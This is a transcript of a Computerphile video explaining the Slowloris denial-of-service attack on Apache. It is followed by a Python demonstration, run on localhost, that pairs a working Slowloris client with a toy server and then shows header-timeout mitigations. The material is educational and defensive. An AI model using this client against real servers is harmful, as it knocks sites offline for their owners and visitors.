Slow Loris Attack - Computerphile
Key Takeaways
Slowloris is a denial of service attack that, instead of flooding a server with traffic, holds many connections open by sending HTTP requests a few bytes at a time and never finishing them. A thread-per-connection server such as Apache hits its connection limit while it waits, so legitimate visitors can't be served, yet the attacker uses almost no bandwidth. Dr Mike Pound from Computerphile explains the mechanics and demonstrates the attack against a local Apache installation.
Full Transcript
This is not really relevant to the video actually, but this is a slow loris. I just thought I'd show it because it was cute, that's all. Don't keep them as pets though. Now, um, Slowloris is, I guess, my favourite denial of service attack. Now that says a lot about me, doesn't it, that I have a favourite denial of service attack. Before I demonstrate anything, of course, let's get it straight out in the open: you shouldn't be using Slowloris on anyone, or any other denial of service attack on anyone else, right, because you'll get in a lot of trouble.

Most denial of service, the idea is that you try and defeat some web server or some computer on the other side of the web by giving it as much bandwidth as you can, such that it breaks, right? They have a certain amount of bandwidth they're allowed to use, and if you give them more than that, or try and request too many web pages, their server goes down. That's the general idea of denial of service. Distributed denial of service is just the next level, where you have multiple computers all attempting to do the same thing, and then more modern denial of service will use amplification and things like this to try and improve this even more. But the whole point is as much bandwidth as you can, all at the same time, right? And if you get enough, you can take them down; if you don't, then they just laugh, right? So, you know, Microsoft and Google, you're going to have difficulty bringing them down, but smaller websites, it can have a massive impact on the amount of money they're making if no one can visit their shop or something like that. So it's a real problem.

What I like about Slowloris is it comes at it from a completely different way. It's a protocol attack, so a layer seven application attack, which doesn't need a lot of bandwidth. So I can do a Slowloris on someone and then just browse the web as normal, play computer games.

So let's think back to how me talking to a web server works. I send off a GET request to a website and I say get me index.html. Then the web server sends back index.html and that's the end of that conversation, right? Then I start up another conversation that says I've read this index.html, I now need, you know, header.jpeg, so I send off another GET request, and so on, and we have these short conversations back and forth. Now usually an HTTP request is just text, right? So it literally says HTTP GET 1.1 or something, index.html, where I'm sending it a bit about me, so I'm using, you know, Firefox or something, um, and then some other data, and it always ends with two carriage return line feeds, so two new lines, right? So normally in text we have a carriage return character and then a line feed character. Two of those signals the end of an HTTP request.

What the inventor of Slowloris, uh, some hacker named RSnake I think, decided was: what if I never send those carriage return line feeds? Can I just keep the website waiting for me? Can I go so slowly, by asking for websites so slowly, that I just break them? Right, and yeah, you can. Um, and so they have things like timeouts and stuff, so maybe let's say I'm in the middle of browsing a website on my phone, right, and just as I'm in the middle of sending off a request I lose phone signal, right? That's pretty common, you know, these days. So that would time out on the server's end as well, and they would let the connection go, and then they could serve someone else a website. The problem comes if I don't send no data, but I send some data, just painfully slowly.

What's great about Slowloris is there's hardly any code. It talks to a web server and it basically says get me index.html or something like that, and then sends a space or a zero or a random number or something like that, and then it waits for about, you know, 10, 20, 30 seconds, just when the website's about to assume it's gone, and sends another single byte and says I'm still here, I'm just really slow. And then it does this again, and it does this again, and keeps that connection going as long as it can. And then it does it with 200 other connections, or as many connections as it can. So my computer sending out this attack is sending 200 byte packets every minute or so. It's not a lot at all, and it's very difficult for a firewall or something to notice this, because these are valid HTTP requests, they're just super slow, right? And, um, you know, maybe I've just got a really bad internet connection. Maybe, yeah.

Um, now this doesn't affect every web server. It mostly affects Apache because of the way Apache works. Unfortunately Apache is very prevalent; there's about 40-50% Apache these days. It's hard to know for sure, but I had a quick check and that seems to be about the rough estimate; they go up and down. Apache, when they designed it, they decided it would be a good idea to start up a new thread to serve every concurrent connection. So when a connection comes in with an HTTP request, they set up a new thread that handles that request, and then the thread goes away when it's finished. Now that wasn't entirely stupid, you know: if the connections appear and then they go away, that's not a problem. But if the connections start to stay open longer than we anticipate, then our connection limit gets reached. So Apache will have a connection limit of, let's say, 200 concurrent connections, because beyond that you've just got so many threads the whole thing starts to grind to a halt. So what Slowloris does is begin to open connections, and as a new one gets freed up from someone else using the website, they'll open that one, and they'll open this one, and they'll open this one, until they've got all the connections.

So let's see how it works, right? So I've come up with another of my glorious websites just for this, Mike's website. So that's actually this computer here, which is running Windows and Apache now. So this is my website with my company profile in lorem ipsum. What this website is is not very important. Let's have a quick look at the code. This is not the original implementation of Slowloris; this is the Python implementation I found, but essentially it's not very long, right, 67 lines, which is another reason I like it, because it's so elegant really. What it does: it has some code here to start up a socket, which is a TCP connection, um, and make a GET request. Here's our GET request text. And then for all existing sockets down here, can we send a little bit more data every 15 seconds, and if a socket dies we recreate it, and we just keep that going. And it will do this for 200 concurrent sockets, which is more than my Apache installation is configured to handle.

So let's run this then. There we are: python slowloris, to the IP address that we just looked at, right? It's created all the sockets, and now it's just going to sit there, every now and again sending a byte of data to this Apache web server. So the web server thinks that it's got 200 people looking at the website, when in fact it's got one person looking at the website really, really slowly, 200 times. If I press refresh on this, because it's been cached, we can see we're now waiting... waiting.

So if you clear the cache now on your browser, would that then not be able to get the website?

No, I wouldn't be able to see the website. So let's go to the website now that we're under Slowloris. So, right, we're waiting for it. I mean, we might get lucky, maybe one of these sockets drops out and then the server can respond, right, but we might not.

But you click to go back to that same website?

Yeah, and of course it can't load it in, so we're just seeing Firefox, yeah. At some point we might see a timeout on this client side saying no, I didn't get any response from the server. This server basically won't serve this website to me because it's too busy serving 200 other websites, or more specifically, busy waiting for us to finish the request 200 times so it can actually finally get on with something.

And how long would that carry on sending those requests?

As long as I want, uh, as long as I want. And as soon as a socket dies, another one comes up and just keeps going. I mean, 67 lines of code, right? And here's a nice bit, fun things to do: I can just use the net as normal. My net is fine, right? I'm not using all my bandwidth to do this; I'm using barely any of my bandwidth, um, which is what I really like about it.

This kind of attack is called a low and slow attack. So there's a couple of others: RUDY, uh, R-U-Dead-Yet, is another one that does similar things. Um, and what's clever about them is they're quite hard to detect, because what it's doing is totally normal HTTP, it's just doing it incredibly slowly. And when people designed this, and when they designed Apache, you know, no one ever thought you'd do something like that. And that's exactly the problem with these sort of protocol attacks: the assumption that they'll always do what you expect them to do, and they won't do these random strange side things. So yeah, my favourite denial of service.
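The mechanics described in the video, as an added example that is not code from the video, from Apache or from the slowloris tool: a toy thread-per-connection server with a fixed worker limit, a Slowloris client that pins every worker with a request head it never finishes, and a normal client that then cannot get served. The same run is then repeated with a hard deadline on how long a request head may take to arrive in total, which is the idea behind Apache's mod_reqtimeout. ToyServer, slowloris, fetch, run_scenario, the 4-worker limit, the timeouts and the header values are this example's own choices, not Apache defaults; everything runs on 127.0.0.1.

```python
import contextlib
import socket
import threading
import time

# A request line and headers WITHOUT the blank line ("\r\n\r\n") that ends an HTTP
# request head, so a server that receives it has to keep waiting for the rest.
PARTIAL_REQUEST = b"GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n"

class ToyServer:
    """Thread per connection, at most `max_conns` at once (Apache's worker limit),
    and `header_timeout` seconds for a worker to receive the whole request head."""
    def __init__(self, max_conns, header_timeout):
        self.header_timeout = header_timeout
        self.slots = threading.Semaphore(max_conns)  # one permit per free worker
        self.dropped = 0                             # connections closed as too slow
        self.sock = socket.create_server(("127.0.0.1", 0), backlog=64)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            self.slots.acquire()        # all workers busy: stop accepting, so new
            try:                        # clients queue in the kernel backlog
                conn, _ = self.sock.accept()
            except OSError:             # listening socket was shut down
                return self.slots.release()
            threading.Thread(target=self._handle, args=(conn,), daemon=True).start()

    def _handle(self, conn):
        deadline = time.monotonic() + self.header_timeout  # absolute, not per read
        buf = b""
        try:
            while b"\r\n\r\n" not in buf:
                remaining = deadline - time.monotonic()
                if remaining <= 0:
                    raise socket.timeout("request head not finished in time")
                conn.settimeout(remaining)
                chunk = conn.recv(1024)
                if not chunk:           # client closed cleanly
                    return
                buf += chunk
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
        except OSError as err:          # timeout: too slow; anything else: peer reset
            self.dropped += isinstance(err, socket.timeout)
        finally:
            conn.close()
            self.slots.release()        # the worker is free again

    def close(self):
        with contextlib.suppress(OSError):        # not every OS allows this, but
            self.sock.shutdown(socket.SHUT_RDWR)  # on Linux it wakes a blocked accept()
        self.sock.close()

def slowloris(addr, connections, interval, stop):
    """Hold `connections` partial requests open, trickle a header line every `interval` s."""
    def open_one():
        s = socket.create_connection(addr, timeout=5)
        s.sendall(PARTIAL_REQUEST)
        return s
    socks = [open_one() for _ in range(connections)]
    while not stop.wait(interval):
        for i, s in enumerate(socks):
            try:
                s.sendall(b"X-a: b\r\n")  # one more valid header, still no blank line
            except OSError:             # server dropped it: take a worker again
                with contextlib.suppress(OSError):
                    socks[i] = open_one()
    for s in socks:
        s.close()

def fetch(host, port, timeout):
    """A normal client: whole request at once; True if answered within `timeout`."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PARTIAL_REQUEST + b"\r\n")  # the blank line completes it
            return s.recv(1024).startswith(b"HTTP/1.1 200")
    except OSError:                     # includes the read timeout
        return False

def run_scenario(header_timeout, attack_interval, probe_timeout=2.0):
    """Attack a fresh ToyServer; return (normal client served?, slow conns dropped)."""
    server = ToyServer(max_conns=4, header_timeout=header_timeout)
    stop = threading.Event()
    # Four attacker sockets for four workers (the real tool opens far more than the
    # server's limit; matching the counts just keeps this demo deterministic).
    attacker = threading.Thread(target=slowloris, daemon=True,
                                args=(("127.0.0.1", server.port), 4, attack_interval, stop))
    attacker.start()
    time.sleep(0.3)                     # let the server accept all four
    served = fetch("127.0.0.1", server.port, probe_timeout)
    stop.set()
    attacker.join()
    server.close()
    return served, server.dropped

if __name__ == "__main__":
    print("30 s allowed per request head:", run_scenario(30.0, 0.2))   # (False, 0)
    print("0.5 s allowed per request head:", run_scenario(0.5, 0.2))   # (True, >= 1)
```

With a 30 second allowance for the request head, the attacker's four sockets hold all four workers and the normal client's request sits in the backlog until its own timeout fires; the server never drops anything because every connection keeps sending a byte or two in time. With an absolute 0.5 second deadline for the whole head, the slow connections are dropped and the waiting client is served. Note that the deadline must be on the whole head, not per read: a per-read idle timeout is defeated by trickling one byte just before it expires, which is exactly what the tool does. In Apache this is mod_reqtimeout, for example `RequestReadTimeout header=20-40,MinRate=500`. A deadline alone only buys time, since the attacker reconnects as soon as a worker is freed, so real deployments combine it with limits on concurrent connections per source address and a front end (event MPM, reverse proxy or CDN) that does not tie up a worker thread per idle connection.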
Original Description
Denial of service usually relies on a flood of data. Slow Loris takes a more elegant approach, and almost bores a server to death. Dr Mike Pound explains.
Cracking Windows by Atom Bombing: https://youtu.be/rRxuh9fp7QI
Zero Size Files: https://youtu.be/kiTTAbeqQKY
Google Deep Dream: https://youtu.be/BsSmBPmPeYQ
Babbage's Analytical Engine: COMING SOON
http://www.facebook.com/computerphile
https://twitter.com/computer_phile
This video was filmed and edited by Sean Riley.
Computer Science at the University of Nottingham: http://bit.ly/nottscomputer
Computerphile is a sister project to Brady Haran's Numberphile. More at http://www.bradyharan.com